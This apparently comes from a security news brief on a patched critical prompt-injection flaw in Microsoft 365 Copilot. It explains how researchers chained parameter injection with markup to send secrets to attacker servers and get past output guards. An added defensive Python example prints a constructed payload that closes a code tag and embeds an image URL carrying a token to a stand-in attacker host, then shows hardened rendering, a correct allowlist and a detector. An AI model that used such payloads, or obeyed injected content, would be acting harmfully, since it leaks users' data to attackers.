In detail
- Microsoft patched a vulnerability in Microsoft 365 Copilot last week that it rated critical, its highest severity.
- Researchers chained a parameter-to-prompt injection (attacker-controlled input reaching the model's prompt through a request parameter) with markup/HTML techniques to bypass guardrails, so that Copilot's rendered output triggered web requests carrying secrets to attacker-controlled servers.
- The built-in output mitigations (wrapping model output in <code> blocks and restricting which domains the output may reference) were circumvented by the exploit chain.
- The root cause is the general prompt-injection problem: LLMs cannot reliably distinguish the user's instructions from instructions embedded in the third-party content they are asked to process.
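The two output-side mitigations listed above, and the way each fails when applied carelessly, are easier to see in code. The following Python is an added example written for this page; it is not Microsoft's code and not the researchers' exploit chain, and the payload, the allowlist and the hostnames (example.com, attacker.invalid) are constructed for the demo. It shows a <code>-wrapping guard that the model's own output can break out of beside an escaping version that cannot, and a substring-based domain allowlist beside a hostname-based one, with a check that lists any host the rendered output would contact without a user click.

```python
"""Render-side guard for LLM output shown in a web UI (added example).

Demonstrates two output-handling mistakes that let injected content turn
into an outbound web request that carries data to an attacker host, and
the corrected versions. All hosts and the payload are constructed for
this demo; none of this is the vendor's or the researchers' code.
"""
import html
import re
from urllib.parse import urlparse

# Constructed allowlist of hosts the UI is permitted to fetch from.
ALLOWED_HOSTS = {"example.com"}

# Constructed payload: injected content that closes the <code> wrapper and
# smuggles an auto-loading image whose URL carries a secret to an attacker.
PAYLOAD = ("Summary: nothing unusual.</code>"
           '<img src="https://attacker.invalid/c?d=SECRET-TOKEN-123">'
           "<code>")


def render_naive(model_output: str) -> str:
    """Broken mitigation: wrap raw output in <code>. The output can close the tag."""
    return f"<code>{model_output}</code>"


def render_hardened(model_output: str) -> str:
    """Escape first, so nothing the model emits is ever parsed as markup."""
    return f"<code>{html.escape(model_output, quote=True)}</code>"


# Syntaxes a browser or Markdown renderer fetches without a click.
AUTO_FETCH_RE = re.compile(
    r"""<img\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)"""   # <img src=...>
    r"""|!\[[^\]]*\]\(\s*([^)\s]+)""",                # ![alt](url)
    re.IGNORECASE,
)


def auto_fetch_urls(rendered: str) -> list[str]:
    """URLs the rendered output would request automatically."""
    return [a or b for a, b in AUTO_FETCH_RE.findall(rendered)]


def host_allowed_naive(url: str) -> bool:
    """Broken allowlist: substring match. Any attacker host that merely
    contains an allowed name (subdomain of the attacker's domain, or the
    allowed name in the query string) passes."""
    return any(h in url for h in ALLOWED_HOSTS)


def host_allowed(url: str) -> bool:
    """Correct allowlist: parse the URL and compare the hostname exactly,
    or as a dot-delimited subdomain of an allowed host."""
    host = (urlparse(url).hostname or "").lower()
    return any(host == h or host.endswith("." + h) for h in ALLOWED_HOSTS)


def violations(rendered: str) -> list[str]:
    """Hosts the rendered output would contact that are not on the allowlist."""
    return sorted({urlparse(u).hostname or u
                   for u in auto_fetch_urls(rendered) if not host_allowed(u)})


if __name__ == "__main__":
    print("naive wrapper   :", violations(render_naive(PAYLOAD)))     # ['attacker.invalid']
    print("hardened wrapper:", violations(render_hardened(PAYLOAD)))  # []
    for u in ("https://example.com/a.png",
              "https://example.com.attacker.invalid/a.png",
              "https://attacker.invalid/?ref=example.com"):
        print(u, "naive:", host_allowed_naive(u), "strict:", host_allowed(u))
```

Escaping closes only the HTML path: if the UI also renders Markdown, an image reference of the form ![alt](url) is a second auto-fetch channel, which is why violations() scans for both syntaxes independently of how the output was wrapped. The allowlist comparison must run on the parsed hostname, never on the raw URL string.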
Why it matters
The finding exposes a structural risk in AI assistants: content they are asked to read can coerce them into leaking the data they have access to, which threatens any business process that feeds emails or web content into an LLM for summarization or automation.
For you
- Audit AI workflows that read emails or third-party content.
- Restrict Copilot access to sensitive mailboxes.
- Disable automated form submissions.
- Increase monitoring of MFA/2FA attempts, which is where use of leaked credentials would surface.